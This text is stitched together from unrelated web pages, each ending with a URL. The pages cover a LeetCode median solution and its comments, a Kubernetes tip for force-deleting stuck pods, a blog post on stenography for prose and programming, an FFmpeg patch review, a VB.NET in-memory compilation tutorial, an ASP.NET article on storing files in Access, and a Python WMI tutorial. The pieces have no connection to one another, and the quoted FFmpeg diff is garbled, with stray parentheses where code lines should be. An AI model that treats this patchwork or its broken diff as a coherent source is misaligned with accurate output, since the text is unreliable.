Using the idea of merge sort. A stack is used to make it easier to find the middle element(s). The time/space cost of this approach may not be the best, but it's straightforward and easy to understand.

import java.util.Stack;

public class Solution {
    public double findMedianSortedArrays(int[] nums1, int[] nums2) {
        int len1 = nums1.length;
        int len2 = nums2.length;
        boolean isEven = (len1 + len2) % 2 == 0;
        Stack<Integer> stack = new Stack<Integer>();
        int i1 = 0, i2 = 0;
        // Push the current smaller element onto the stack until
        // stack.size() > (len1 + len2) / 2; the top one or two
        // elements can then be used to compute the median.
        while (i1 < len1 || i2 < len2) {
            if (i1 >= len1 || i2 >= len2) {
                // nums1 or nums2 has run out of numbers
                if (i1 < len1) {
                    stack.push(nums1[i1]); i1++;
                } else {
                    stack.push(nums2[i2]); i2++;
                }
            } else {
                // push the smaller of nums1[i1] and nums2[i2]
                if (nums1[i1] > nums2[i2]) {
                    stack.push(nums2[i2]); i2++;
                } else {
                    stack.push(nums1[i1]); i1++;
                }
            }
            if (stack.size() > (len1 + len2) / 2) {
                if (isEven) { // the two elements either side of the midpoint are on top
                    return (stack.pop() + stack.pop()) / 2.0;
                } else {      // the middle element is on top
                    return stack.pop();
                }
            }
        }
        return 0;
    }
}

@davidthinkle.ding Hello, there is something I don't understand: if one array is 4,5,6 and the other is 1, the median should be 4.5, shouldn't it? But I get 5.5, so I want to ask why. Is my understanding wrong?

@davidthinkle.ding The time complexity seems to be O(m+n), rather than the O(log(m+n)) the problem asks for.
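As the second comment notes, the merge approach is O(m+n). For reference, the O(log(min(m,n))) bound usually quoted for this problem comes from binary-searching a partition point instead of merging. A rough sketch of that alternative approach (not part of the original post; function name is my own):

```python
def find_median_sorted_arrays(nums1, nums2):
    # Binary-search a partition of the shorter array so that everything
    # on the combined left side is <= everything on the right side.
    if len(nums1) > len(nums2):
        nums1, nums2 = nums2, nums1
    m, n = len(nums1), len(nums2)
    lo, hi = 0, m
    while lo <= hi:
        i = (lo + hi) // 2          # elements of nums1 on the left side
        j = (m + n + 1) // 2 - i    # elements of nums2 on the left side
        left1 = nums1[i - 1] if i > 0 else float("-inf")
        right1 = nums1[i] if i < m else float("inf")
        left2 = nums2[j - 1] if j > 0 else float("-inf")
        right2 = nums2[j] if j < n else float("inf")
        if left1 <= right2 and left2 <= right1:
            if (m + n) % 2:  # odd total: median is the largest left element
                return float(max(left1, left2))
            return (max(left1, left2) + min(right1, right2)) / 2.0
        if left1 > right2:   # partition in nums1 is too far right
            hi = i - 1
        else:                # partition in nums1 is too far left
            lo = i + 1
```

For the example in the first comment, find_median_sorted_arrays([4, 5, 6], [1]) gives 4.5.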
https://discuss.leetcode.com/topic/61034/straightforward-idea-of-merge-sort-easy-to-understand
I was trying to delete a replication controller with 15 pods, and a few of the pods got stuck in Terminating status. What's the issue?

Force delete the pod:

kubectl delete pod --grace-period=0 --force --namespace <NAMESPACE> <PODNAME>

Alternatively, delete the finalizers block from the resource (pod, deployment, ds, etc.) YAML:

"finalizers": [
    "foregroundDeletion"
]
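The finalizer-removal step can also be pictured programmatically. As a sketch only (not an official Kubernetes client snippet; the function name and the manifest shape are invented for illustration), stripping the finalizers block from a resource manifest looks like this:

```python
import json

def strip_finalizers(manifest):
    # Remove metadata.finalizers so Kubernetes can complete the deletion.
    metadata = manifest.get("metadata", {})
    metadata.pop("finalizers", None)
    return manifest

pod = json.loads("""{
  "kind": "Pod",
  "metadata": {"name": "stuck-pod", "finalizers": ["foregroundDeletion"]}
}""")
cleaned = strip_finalizers(pod)
```

In practice you would apply the same change with kubectl patch or edit rather than hand-editing JSON.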
https://www.edureka.co/community/17477/pod-status-terminating-kubernentes?show=17480
, I talked about how steno could be used by people who speak with voice synthesizers, making it easy to communicate in English at true conversational speeds using only their fingers. In this part I want to talk about the benefit of steno in prose composition. I'm currently writing this on a qwerty keyboard on a subway train (the A down to Hoyt-Schermerhorn in Brooklyn, if you're interested) because there isn't room to use my steno machine and my laptop's keyboard isn't antighosting, so I can't use Plover (which also needs a file output option before it will be anything more than a demo; planning to get on that very soon). I'm typing out every letter of every word I want to write, plus spaces between each word. Though I make my living writing in steno, I still use qwerty for a lot of things, because my $4,000 proprietary steno software isn't much good as a keyboard replacement and because my steno machine isn't always immediately to hand. I'm pretty used to it; before I learned steno, I worked for several years as a qwerty transcriptionist, and I can type at around 110 words per minute. Even so, whenever I switch to qwerty, it feels so clumsy and plodding. It's not all that great for my wrists either, but I'll write more about that later, in the section on using steno to avoid repetitive stress injuries. Mainly it's just such an inefficient input mechanism. I already know the word I want to write when I type the first letter, but instead of moving on to the next word, I have to spend however many more fractions of a second typing out the rest of the letters, then pressing space, then starting on the second word. It artificially slows down my thinking and forces a staccato note into whatever I'm writing. Steno, by contrast, is quick, clean, and smooth.
Many famous writers composed their works in pen shorthand, including Samuel Pepys, Astrid Lindgren (author of the Pippi Longstocking books), and Charles Dickens, whose work as a London court reporter probably had a lot to do with his matchless ear for dialogue. The trouble with pen shorthand, though, is that it needs to be transcribed manually, which few modern writers have the patience for. Machine steno, on the other hand, can produce digital text three times more efficiently than the best qwerty typist can type; but I don't know of any authors who use a steno machine in their work. This is almost certainly due to the high cost of the equipment and software, coupled with a general lack of knowledge about the benefits of steno. Steno is an unparalleled method of text input, especially for high-volume work, where fluency of thought is vitally important. Writers and programmers would seem to profit the most from it, considering the amount of time they spend putting words up on a screen. If you're only interested in programming, skip down three paragraphs. If you're a writer, keep reading. I think this applies equally to essayists, bloggers, science writers, business writers, and the rest of the gamut, but most of my experience has been as an intermittent writer of amateur fiction, so I'll use that as a template to extrapolate from. I'm sorry to say that I don't get the chance to do much writing for most of the year, but I'm a longtime participant in National Novel Writing Month, the yearly ordeal in which otherwise sane people try to write 50,000 words of fiction in 30 days, just for the fun of it. I've attempted it four times and won it twice. The first time I won, I was living with my parents after college and working the graveyard shift in a group home, where my duties involved about three hours of actual work and five hours of sitting on a couch keeping watch over a house full of peacefully sleeping people. 
I wiped my November clean of social engagements and devoted nearly every waking hour in November to my novel. It was a terrible piece of writing, but after sweating and moaning and suffering untold tortures, I wrote the last of my 50,000 words and declared victory just shy of the December 1st deadline. Six years later, I won again, but my circumstances had changed. In that time, I had moved to New York City, learned steno, and found my own apartment. I was supporting myself and my partner with my CART business, plus working weekends as a theater captioner and picking up a bit of transcription on the side. I didn't have the luxury to sweat and moan over a novel; if I wanted to write, I had to do it between CART gigs. There's no way I could have done it without steno. Every day, between one job and another, I'd haul my gear to the Square Root Cafe and bang out a couple of chapters between bites of grilled cheese sandwich. It wasn't great writing by a long shot, but it flowed in a way that I'd never experienced before. Every word my characters said to me came up on the screen as quickly as they could have spoken them. Before, in the time it took me to type out the six or seven letters that made up each word, my brain would cloud over and I would start second-guessing myself so much it was a mighty battle even to get to the end of a sentence. With steno, most words came in a single stroke, so my text was able to keep ahead of my doubts and excuses and just keep going. I could write for half an hour on the subway going home, or pull out my gear and do a quick 10 minutes in the park before schlepping onward to my next gig. Before, I would have told myself that I didn't have time to get anything substantial done in those few scattered intervals, that I needed several solid hours to get into the flow and mood of writing. After learning steno, I couldn't get away with that ploy. Before I knew it, my 10 minutes were over, but I'd managed to fill half a dozen pages. 
It wasn't even the speed that helped me do it, primarily; it was the fluency that steno gave to my thinking. (Image: The cover of my 2008 NaNovel.) Switching suddenly from fiction to programming might make for a weird transition, but it's one I've made myself over the past year, so it bears mentioning. This November, instead of attempting NaNo again, I decided to find a Python tutor to help me develop this idea for an open source steno program that had been fighting to get out of my head for several years already. Part of the frustration was that, try as I might, I was never able to make my steno software work effectively with Vim, my favorite text editor. Even when writing fiction, the 1.5-second time delay built into Eclipse's buffer drove me crazy. In the program itself, it lets me see my words instantly (in a sort of distorted "preview mode" that I have to turn off when I'm CARTing, because it's too distracting to my clients), but when I piped its output to other programs, the delay was there not only when I tried to write using steno, but when I tried to edit or navigate around the document as well. I still haven't managed to find a good solution to programming using the steno keyboard, but I can see so clearly what it might be like, if only the software were properly designed. Programming is especially suited for steno, because there's so much boilerplate to write again and again, even in an eloquent language like Python. If I want to define a function, I have to type: def someFunction(arg): stuff. That's eight strokes just to get started, plus 20 more strokes to write "someFunction", "arg", and "stuff". In steno, on the other hand, you could write something like D*FD in a single stroke, and it would put in the def, the space, the parentheses, the colon and the carriage return automatically, then jump you up to the space after the def to write your function name and arguments, then drop you back down to the body of the function, all in four strokes.
Best of all, once you defined that function name in your steno dictionary, you wouldn't need to worry about remembering to write out the name in camel case each time. Just use a single stroke like SPHU*PBGS (pronounced "smunction"), for instance, and start thinking of it as just another word, instead of two words mashed together in a lexically unnatural way. I love the way Vim has mapped a useful command to each key of the qwerty keyboard. It's immensely powerful once you get used to it. But it's only got 26 keys to choose from, and it takes a long time to learn which key does what, since the correlation between "move one word forward" and the "w" key is pretty abstract and arbitrary. In steno, you could certainly keep using just the w key, if it's what you're used to, but you could also, say, map the "move one word forward" command to a single stroke like "WOFRD" (pronounced "woffered"). That's mnemonically much more useful than just "w", and an even bigger advantage is that the number of possible one-stroke commands is almost infinite. Instead of one stroke equalling one letter, steno lets one stroke equal one syllable, which is about five times more efficient quantitatively. As a qualitative improvement, the advantage is inestimable. Mark Twain, one of the first professional authors to buy a typewriter, said: "The machine has several virtues. I believe it will print faster than I can write. One may lean back in his chair and work it. It piles an awful stack of words on one page. It don't muss things or scatter ink blots around." Mr. Clemens was a forward-thinking man, and qwerty was a remarkable innovation for its time. It's been responsible for over a century of great prose and programming. But everything he says there goes for steno too -- plus a whole lot more besides.
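The dictionary-lookup model described above is easy to picture in code. A toy sketch (the strokes and expansions here are made up for illustration; real steno software such as Plover uses far richer dictionaries and chord handling):

```python
# Map a chorded stroke to its output text or editor command.
steno_dict = {
    "SPHU*PBGS": "someFunction",     # "smunction": a user-defined brief
    "WOFRD": "<move-word-forward>",  # a mnemonic command stroke
    "D*FD": "def ():\n",             # boilerplate expansion for a function stub
}

def translate(strokes):
    # Look each stroke up; fall back to the raw stroke if it's undefined.
    return "".join(steno_dict.get(s, s) for s in strokes)
```

One stroke maps to a whole word, command, or boilerplate fragment, which is the efficiency argument the post is making.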
http://plover.stenoknight.com/2010/04/writing-and-coding-with-steno.html
On Wed, Apr 10, 2019 at 12:44 AM Mark Thompson <sw at jkqxz.net> wrote:
>
> On 09/04/2019 23:14, Baptiste Coudurier wrote:
> > ---
> >  libavcodec/h264_parse.c  | 2 +-
> >  libavcodec/h264_parser.c | 2 +-
> >  libavcodec/h264_ps.c     | 4 ++--
> >  libavcodec/h264_ps.h     | 4 ++--
> >  libavcodec/h264dec.c     | 6 +++---
> >  5 files changed, 9 insertions(+), 9 deletions(-)
> >
> > diff --git a/libavcodec/h264_ps.c b/libavcodec/h264_ps.c
> > index 17bfa780ce..980b1e189d 100644
> > --- a/libavcodec/h264_ps.c
> > +++ b/libavcodec/h264_ps.c
> > @@ -330,8 +330,8 @@ void ff_h264_ps_uninit(H264ParamSets *ps)
> >      ps->sps = NULL;
> >  }
> >
> > )
> > {
> >     AVBufferRef *sps_buf;
> >     int profile_idc, level_idc, constraint_set_flags = 0;
> > diff --git a/libavcodec/h264_ps.h b/libavcodec/h264_ps.h
> > index e967b9cbcf..d422ce122e 100644
> > --- a/libavcodec/h264_ps.h
> > +++ b/libavcodec/h264_ps.h
> > @@ -149,8 +149,8 @@ typedef struct H264ParamSets {
> >  /**
> >   * Decode SPS
> >   */
> > );
>
> Making the H.264 decoder's internal SPS and PPS structures fixed API really doesn't feel like a good idea to me, but I admit I don't have a better answer to the problem you're facing. Copying everything is also pretty terrible. Adding a new API to parse the headers and return the information you want might be nicer considering just this change, but extensibility for the inevitable subsequent patch which wants some extra piece of information in future would be a big pain.
>
> If you're going to go with this, please add namespace prefixes to the structures it affects ("SPS" and "PPS", since you're now including them in code which isn't explicitly H.264), and also add big warnings to the header indicating that the structures are now fixed and can't be modified at all except on major bumps. (Though maybe wait for other comments before actually making any changes.)

I agree that I really don't like exporting these functions. For example, this function takes an AVCodecContext. It's reasonable to assume when touching this function right now that it's a valid AVCodecContext with a valid H264Context inside of it. Apparently right now it's only used for logging, so some crazy cast appears to work, but in the future? Internal decoder functionality has no place being exported; it puts too many limits in place for future changes. Either the API needs to be wrapped in a proper external interface, leaving our internal interface open to changes, or a simplified version should be implemented in avformat, like we already did for a bunch of other video formats as it was required. The SPS isn't that complex tbh, so maybe implementing a simplified parser for mxf might be the best option.

- Hendrik
http://ffmpeg.org/pipermail/ffmpeg-devel/2019-April/242406.html
Sometimes it is useful to add some programmability to your projects, so that a user can change or add logic. This can be done with VBScript and the like, but what fun is that when .NET allows us to play with the compiler? Obviously, your compiled "script" is going to be much faster than interpreted VBScript or JScript. I'll show you how to compile VB.NET into an assembly programmatically, in memory, then use that code right away. The demo project is a simple windows application. Here in the article I'll describe how to call a static function; the included project also has an example of creating an instance of an object and accessing that instance's properties and methods. The namespaces we'll need for compiling are in System.dll, so they'll be available in a default project in Visual Studio. Now drag some controls onto the form - you'll need a textbox for the code, a compile button, and a listbox to show your compile errors. They're called txtCode, btnCompile, and lbErrors, respectively. I know, you never get compile errors, but your users might. :-) For this demo I'll just put a sample class in the form when it loads. Here is the part of the class definition that I'll use in this article; the demo project has more functionality.

Public Class Sample
    Public Shared Function StaticFunction(ByVal Arg As String) As String
        Return Arg.ToUpper()
    End Function
    ...
End Class

Now we get to the fun part, and it's surprisingly easy. In the compile button's click handler, the following bit of code will compile an assembly from the sample code.
Dim provider As Microsoft.VisualBasic.VBCodeProvider
Dim compiler As System.CodeDom.Compiler.ICodeCompiler
Dim params As System.CodeDom.Compiler.CompilerParameters
Dim results As System.CodeDom.Compiler.CompilerResults

params = New System.CodeDom.Compiler.CompilerParameters
params.GenerateInMemory = True 'Assembly is created in memory
params.TreatWarningsAsErrors = False
params.WarningLevel = 4

'Put any references you need here - even your own dll's, if you want to use one
Dim refs() As String = {"System.dll", "Microsoft.VisualBasic.dll"}
params.ReferencedAssemblies.AddRange(refs)

Try
    provider = New Microsoft.VisualBasic.VBCodeProvider
    compiler = provider.CreateCompiler
    results = compiler.CompileAssemblyFromSource(params, txtCode.Text)
Catch ex As Exception
    'Compile errors don't throw exceptions; you've got some deeper problem...
    MessageBox.Show(ex.Message)
    Exit Sub
End Try

That's it, we're ready to compile! First, though, I want to see any compile errors that my - ahem - user's incorrect code has generated. The CompilerResults object gives me plenty of information, including a list of CompilerError objects, complete with the line and character position of the error. This bit of code adds the errors to my listbox:

lbErrors.Items.Clear()
Dim err As System.CodeDom.Compiler.CompilerError
For Each err In results.Errors
    lbErrors.Items.Add(String.Format( _
        "Line {0}, Col {1}: Error {2} - {3}", _
        err.Line, err.Column, err.ErrorNumber, err.ErrorText))
Next

Now I want to do something with my compiled assembly. This is where things start to get a little tricky, and the MSDN sample code doesn't help as much. Here I'll describe how to call the static (shared) function StaticFunction. Sorry about the semantic confusion, I transitioned from MFC... A member variable in the form class will hold the compiled assembly:

Private mAssembly As System.Reflection.Assembly

The assembly is retrieved from the CompilerResults object, at the end of the btnCompile_Click function:
If results.Errors.Count = 0 Then 'No compile errors or warnings...
    mAssembly = results.CompiledAssembly
End If

I put a couple of text boxes on my form for the function argument and result. The static function is called by the following code in the test button's click handler:

Dim scriptType As Type
Dim instance As Object
Dim rslt As Object

Try
    'Get the type from the assembly. This will allow us access to
    'all the properties and methods.
    scriptType = mAssembly.GetType("Sample")

    'Set up an array of objects to pass as arguments.
    Dim args() As Object = {txtArgument.Text}

    'And call the static function
    rslt = scriptType.InvokeMember("StaticFunction", _
        System.Reflection.BindingFlags.InvokeMethod Or _
        System.Reflection.BindingFlags.Public Or _
        System.Reflection.BindingFlags.Static, _
        Nothing, Nothing, args)

    'Return value is an object, cast it back to a string and display
    If Not rslt Is Nothing Then
        txtResult.Text = CType(rslt, String)
    End If
Catch ex As Exception
    MessageBox.Show(ex.Message)
End Try

The key thing here is the InvokeMember call. You can find the definition in MSDN, so I won't go into too much detail. The arguments are as follows: the name of the member to invoke; the BindingFlags, which say what to do (BindingFlags.InvokeMethod) and what type of thing we're looking for - BindingFlags.Public Or'd with BindingFlags.Static, which describes a function declared as Public Shared in VB.NET. Be careful to get these flags right; if they don't accurately describe the desired function, InvokeMember will throw a MissingMethod exception. Next comes a Binder object; this can be used to perform type conversion for arguments, among other things, but you can get by without it and just pass Nothing. Then comes the target object, which is Nothing here because we're calling a static function, and finally the array of arguments. The demo code adds buttons for creating an instance of the Sample class and accessing a property and method of that instance. Have fun with it! In this example I keep the assembly in a member variable, but that's not strictly necessary. If you use it to create an instance of the class you want to use, and hang onto the Type object and your instance, you can let the assembly go out of scope.
The framework also includes CSharpCodeProvider and JScriptCodeProvider classes, which can be used to compile code written in those languages. The latter is in Microsoft.JScript.dll. I think I remember reading somewhere that only the JScript compiler was implemented in the 1.0 version of the framework, and the MSDN documentation of these classes says "Syntax based on .NET Framework version 1.1." However, I had no trouble dropping this code into a VS 2002 project and running it. If anyone has a problem doing that or can clarify what the differences are between the two framework versions, it would be nice to note these in a revision to this article.
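The same pattern - compile source text in memory, then invoke a function from it by name - exists in other environments too. A rough Python analogue for comparison (illustrative only; it sidesteps the sandboxing concerns a real scripting host would need to address):

```python
def compile_and_invoke(source, func_name, *args):
    # Compile user-supplied source into a code object (the "assembly
    # in memory"), execute it in a fresh namespace, then look the
    # function up by name -- roughly what InvokeMember does via reflection.
    namespace = {}
    code = compile(source, "<user-script>", "exec")
    exec(code, namespace)
    return namespace[func_name](*args)

script = """
def static_function(arg):
    return arg.upper()
"""
result = compile_and_invoke(script, "static_function", "hello")
```

As with CompileAssemblyFromSource, syntax errors surface at the compile step (here as a SyntaxError) rather than when the function is invoked.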
http://www.codeproject.com/KB/vb/DotNetCompilerArticle.aspx
I'll start by discussing the data type that Access offers to support storing files: the Ole Object data type. OLE (Object Linking and Embedding) is the technology that the Office suite of products use to assist with sharing files across applications. For example, when you insert a picture in a Word document, OLE comes into play. When you see Excel spreadsheets embedded in a Word doc, again, it's the result of OLE. Finally, if you download the sample Northwind database, you will see the worst possible quality images of the sales people appear on the Employees form. This is also OLE at work. OLE servers are applications which are responsible for converting original files into something that OLE can work with. Taking something like a jpeg or gif, the OLE Server responsible will reformat the file and possibly increase its overall size by up to 100 times to make it work with OLE. It will often reduce quality markedly. The application that displays the result must understand the format, and the correct OLE servers must be in place to decode the database field content. To cap it all, there is a performance overhead required in encoding and decoding OLE's proprietary format. All of this goes to make OLE totally unsuitable for files to be used in web applications. It is also OLE that has helped give Access a poor reputation when it comes to storing images or files within it. The OLE Object field is also happy to accept Long Binary Data, which is basically a BLOB (Binary Large OBject). Being a byte-for-byte copy of the original file, the BLOB is easy to extract and present in its original form over HTTP, but not so easy within the Access application itself. For this demonstration, I have taken the Northwind sample database and added a few fields to the Employees table.
There is already an OLE Object field for Photo, and to this I add the following:

PhotoFileName    TEXT
PhotoMime        TEXT
Resume           OLE Object
ResumeFileName   TEXT
ResumeMime       TEXT

The fields with "Mime" in their name will be used to store the content-type of the file. Browsers look at this property to decide how to treat an HTTP response. If the MIME type is one that they know, they will either display the content inline (where they are set up to do so, such as with text/html or image/gif) or they will invoke the default application for the known MIME type (e.g. MS Word for application/msword). Finally, if they do not know what to do, they present the Save/Open dialogue box. The next step is to create an Employee Entry page, so that users can create a new employee, and upload an image and a Resume (or CV as we call them in Rome):

<%@ Page Language="C#" %>

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>
    <style type="text/css">
        body{font-family: tahoma;font-size: 80%;}
        .row{clear: both;}
        .label{float: left;text-align: right;width: 150px;padding-right: 5px;}
    </style>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <div class="row">
            <span class="label"><label for="FirstName">First Name: </label></span>
            <asp:TextBox ID="FirstName" runat="server"></asp:TextBox>
        </div>
        <div class="row">
            <span class="label"><label for="Surname">Surname: </label></span>
            <asp:TextBox ID="Surname" runat="server"></asp:TextBox>
        </div>
        <div class="row">
            <span class="label"><label for="Photo">Photo: </label></span>
            <asp:FileUpload ID="PhotoUpload" runat="server" />
        </div>
        <div class="row">
            <span class="label"><label for="Resume">Resume: </label></span>
            <asp:FileUpload ID="ResumeUpload" runat="server" />
        </div>
        <div class="row">
            <span class="label">&nbsp;</span>
            <asp:Button ID="Button1" runat="server" Text="Submit" OnClick="Button1_Click" />
        </div>
    </div>
    </form>
</body>
</html>

I've used a bit of CSS to style this and the result looks like this: All of the action takes place in the Button1_Click event in the code-behind:

protected void Button1_Click(object sender, EventArgs e)
{
    if (PhotoUpload.HasFile && ResumeUpload.HasFile)
    {
        Stream photoStream = PhotoUpload.PostedFile.InputStream;
        int photoLength = PhotoUpload.PostedFile.ContentLength;
        string photoMime = PhotoUpload.PostedFile.ContentType;
        string photoName = Path.GetFileName(PhotoUpload.PostedFile.FileName);
        byte[] photoData = new byte[photoLength];
        photoStream.Read(photoData, 0, photoLength);

        Stream resumeStream = ResumeUpload.PostedFile.InputStream;
        int resumeLength = ResumeUpload.PostedFile.ContentLength;
        string resumeMime = ResumeUpload.PostedFile.ContentType;
        string resumeName = Path.GetFileName(ResumeUpload.PostedFile.FileName);
        byte[] resumeData = new byte[resumeLength];
        resumeStream.Read(resumeData, 0, resumeLength);

        string qry = "INSERT INTO Employees (FirstName, LastName, Photo, PhotoFileName, PhotoMime, Resume, ResumeFileName, ResumeMime) VALUES (?,?,?,?,?,?,?,?)";
        string connect = "Provider=Microsoft.Jet.OleDb.4.0;Data Source=|DataDirectory|Northwind.mdb";
        using (OleDbConnection conn = new OleDbConnection(connect))
        {
            OleDbCommand cmd = new OleDbCommand(qry, conn);
            cmd.Parameters.AddWithValue("", FirstName.Text);
            cmd.Parameters.AddWithValue("", Surname.Text);
            cmd.Parameters.AddWithValue("", photoData);
            cmd.Parameters.AddWithValue("", photoName);
            cmd.Parameters.AddWithValue("", photoMime);
            cmd.Parameters.AddWithValue("", resumeData);
            cmd.Parameters.AddWithValue("", resumeName);
            cmd.Parameters.AddWithValue("", resumeMime);
            conn.Open();
            cmd.ExecuteNonQuery();
        }
    }
}

The two upload controls are checked for the presence of a file each, and then the contents of the files are read into byte arrays, and their content types and names are obtained. These, along with the first name and last name, are passed into the parameters before the whole lot is inserted into the database. Having got the files there, some way is needed to retrieve them and deliver them to the browser. A Generic Handler is a good option for this. I decided to create two: one for the Resume and one for the Photo. You might be tempted to combine both tasks into one handler.
I'm only going to show the Resume handler, because apart from the SQL and the data fields, all the code is the same as the PhotoHandler:

<%@ WebHandler Language="C#" Class="ResumeFileHandler" %>

using System;
using System.Data.OleDb;
using System.Web;

public class ResumeFileHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        string qry = "SELECT Resume, ResumeFileName, ResumeMime FROM Employees WHERE EmployeeID = ?";
        string connect = "Provider=Microsoft.Jet.OleDb.4.0;Data Source=|DataDirectory|Northwind.mdb";
        using (OleDbConnection conn = new OleDbConnection(connect))
        {
            OleDbCommand cmd = new OleDbCommand(qry, conn);
            cmd.Parameters.AddWithValue("", context.Request.QueryString["ID"]);
            conn.Open();
            using (OleDbDataReader rdr = cmd.ExecuteReader())
            {
                if (rdr.Read())
                {
                    context.Response.AddHeader("content-disposition", "attachment; filename=" + rdr["ResumeFileName"]);
                    context.Response.ContentType = rdr["ResumeMime"].ToString();
                    context.Response.BinaryWrite((byte[])rdr["Resume"]);
                }
            }
        }
    }

    public bool IsReusable
    {
        get { return false; }
    }
}

A generic handler (.ashx file) implements IHttpHandler, which enforces two methods - ProcessRequest() and IsReusable. All the action takes place in ProcessRequest. I'm passing in the EmployeeID via the querystring, and ASP.NET will serve requests to files ending in .ashx. The code obtains the values for the file name and content type, and then sets the response headers accordingly, before finally streaming the file as an array of bytes. An example page which lets the user get the files is as follows:

<form id="form1" runat="server">
<div>
    <a href="ResumeFileHandler.ashx?ID=12">Get Resume</a>
    <br />
    <img src="ImageFileHandler.ashx?ID=12" alt="" />
</div>
</form>

To provide access to the Resume, a simple hyperlink is all that's needed. The file is delivered when the user clicks the link. The image, on the other hand, has its src pointing to the file handler. When the html for the page is first sent to the browser, it then looks at other "resources" that the page needs, and requests them one by one. The src attribute of the img tag points to the location of one of these resources. Storing files as byte arrays in Access is a lot more efficient than embedding OLE objects.
If your site is one that needs to serve a relatively small number of users on an intranet, this approach may serve you well. However, as I said at the beginning of the article, the preferred option is to store a filename in the database and the files on disc. I debated whether I should provide guidance on what I believe to be the wrong way to manage files with Access, but I see requests for help on this quite often. However, if you have no choice about how you work, for example because you have to deal with a legacy database with files already in it, hopefully this article will have provided you with some help.

8 Comments

- jared
- Vishal: But I would like to know the method to change the photo of an employee in future if he/she wishes to do so? Please help!
- zelio
- Hans_V: byte[] photoData = new byte[photoLength-1]; byte[] resumeData = new byte[resumeLength-1];
- Mike: Good spot! I have amended the code accordingly.
- Brian: Is the code for the Button1_Click stored in the same file as the main html form page AccessUpload.aspx? Or are you saving it as a separate file and using it as an include file? If you have a completed demo file I can look at, that would be great. I am just trying to convert as much of my Classic ASP to VB or C# as I can, but need a clearer reference. Thanks
- Mike: The button_click code is usually in the code-behind file - unless you are not using code-behind files, in which case it will go in the <script> block at the top of your web form. Having said that, with your background you might be better off using the Web Pages framework rather than Web Forms. Here's an example of how to do the same thing with a SQL Compact database and Razor Web Pages:
- Karthekeyan A S
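The BLOB round trip at the heart of this article is independent of Access. A minimal Python/sqlite3 sketch of the same idea (store the raw bytes plus file name and MIME type, read them back byte-for-byte; the table and column names are invented for this example):

```python
import sqlite3

# In-memory database standing in for the Access .mdb file.
conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE employees (
    id INTEGER PRIMARY KEY,
    resume BLOB, resume_name TEXT, resume_mime TEXT)""")

# Store the file exactly as uploaded: raw bytes, name, and content type.
data = b"%PDF-1.4 fake resume bytes"
conn.execute(
    "INSERT INTO employees (resume, resume_name, resume_mime) VALUES (?, ?, ?)",
    (data, "resume.pdf", "application/pdf"))

# Retrieve it for serving; the bytes come back unchanged, and the MIME
# type tells the browser how to treat the response.
row = conn.execute(
    "SELECT resume, resume_name, resume_mime FROM employees WHERE id = 1"
).fetchone()
```

Because the BLOB is a byte-for-byte copy, serving it over HTTP needs nothing more than the stored content-type header and the raw bytes, which is exactly what the generic handler above does.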
http://www.mikesdotnetting.com/article/123/storing-files-and-images-in-access-with-asp-net
WMI is available on Windows Vista, Windows Server 2003, Windows XP, Windows Me, and Windows 2000 (see the Wikipedia entry for WMI). This tutorial covers accessing WMI specifically using the Python programming language and assumes you have downloaded and installed Python itself, the pywin32 extensions and the WMI Python module. Python is able to use WMI by means of COM-enabling packages such as Mark Hammond's pywin32 extensions or the comtypes spinoff from Thomas Heller's ctypes. The WMI module assumes that the pywin32 extensions are present, and exposes a slightly more Python-friendly interface to the sometimes messy WMI scripting API. NB it does nothing but wrap pywin32 functionality: if WMI under pywin32 is too slow, this module won't be any faster. We're not really going to be looking at what you can do with WMI in general, except by way of demonstrating some functionality within the module. There is no shortage of examples around the web of what you can do with the technology (and you can do most things with it if you try hard enough). Some links are at the bottom of the document.

Most of the time, you'll simply connect to the local machine with the defaults:

import wmi
c = wmi.WMI()

If you need to connect to a different machine, specify its name as the first parameter:

import wmi
c = wmi.WMI("other_machine")

The most common thing you'll be doing with WMI is finding out about various parts of your system. That involves determining which WMI class to interrogate and then treating that as an attribute of the Python WMI object:

import wmi
c = wmi.WMI()
for os in c.Win32_OperatingSystem():
    print os.Caption

There are some helpful links at the bottom of this document, but I often simply stick "WMI thing-to-do" into my search engine of choice and scan the results for convincing answers. Note that, although there is only, in this case, one Operating System, a WMI query always returns a list, possibly of one item. The items in the list are wrapped by the Python module for attribute access.
In this case, the Win32_OperatingSystem class has several attributes, one of which is .Caption, which refers to the name of the installed OS.

WMI has the concept of events. There are two types, intrinsic and extrinsic, which are discussed below. The Python module makes the difference as transparent as it can. Say you wanted to track new processes starting up:

import wmi
c = wmi.WMI()
process_watcher = c.Win32_Process.watch_for("creation")
while True:
    new_process = process_watcher()
    print new_process.Caption

Note that you must pass one of "creation", "deletion", "modification" or "operation" to the .watch_for method. If not, slightly odd errors will result.

New in version 1.3.1: If you don't specify a notification type to an intrinsic event then "operation" will be assumed, which triggers on any change to an object of that class.

Some, but by no means all, WMI classes allow for the possibility of writing information back. This you do by setting attributes as usual in Python. Note that the class may let you do this without complaint even though nothing useful has happened. To change the display name of a service, for example, you need to call the service's .Change method. You can update the displayName attribute directly without error, but it will have no effect.

The most typical place in which you'll set an attribute directly is when you're creating a whole new object from a class's .new method. In that case you can either set all the parameters as keyword arguments to the .new call or you can specify them one by one afterwards.

Some WMI classes have methods to operate on them. You can call them as though they were normal class or instance methods in Python. From version 1.3.1, parameters can be positioned; before that, they must be named.
If you wanted to stop the (running) RunAs service, whose short name is "seclogon":

import wmi
c = wmi.WMI()
for service in c.Win32_Service(Name="seclogon"):
    result, = service.StopService()
    if result == 0:
        print "Service", service.Name, "stopped"
    else:
        print "Some problem"
    break
else:
    print "Service not found"

The basics of what can be done with the WMI module is covered above and this is probably as far as many people need to go. However, there are many slight subtleties to WMI and you may find yourself studying a VBS-oriented example somewhere on the web and thinking "How do I do this in Python?".

The .connect function (aliased as .WMI) has quite a few parameters, most of which are optional and can safely be ignored. For the majority of them, I would refer you to the MS documentation on WMI monikers into which they slot fairly straightforwardly. We will introduce here a few of the more common requirements.

This is the most common and the most straightforward extra parameter. It is the first positional parameter or the one named "computer". You can connect to your own computer this way by specifying nothing, a blank string, a dot or any of the computer's DNS names, including localhost. But usually you just don't need to pass the parameter at all. To connect to the WMI subsystem on a computer named "MachineB":

import wmi
c = wmi.WMI("MachineB")

